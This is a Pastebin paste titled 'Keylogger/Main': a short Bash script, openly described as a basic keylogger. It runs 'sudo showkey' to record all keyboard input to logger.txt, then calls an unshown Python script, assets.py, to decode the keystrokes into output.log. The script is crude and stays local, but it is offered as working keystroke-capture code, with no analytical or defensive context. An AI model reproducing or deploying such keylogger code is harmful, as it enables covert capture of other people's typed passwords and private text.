Advertisement
FlyFar

Keylogger/Main

Oct 25th, 2021
239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.40 KB | None | 0 0
  1. #!/bin/bash
  2. # This is a very basic keylogger which takes input from keyboard using the showkey command
  3. # and stores the logs
  4. sudo showkey > ./logger.txt   # captures all the characters entered and stores in logger.txt file in coded form
  5. python assets.py         # runs the python script and decodes all the characters using logger.txt and keymaps.txt
  6.                            # and stores the results in output.log
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement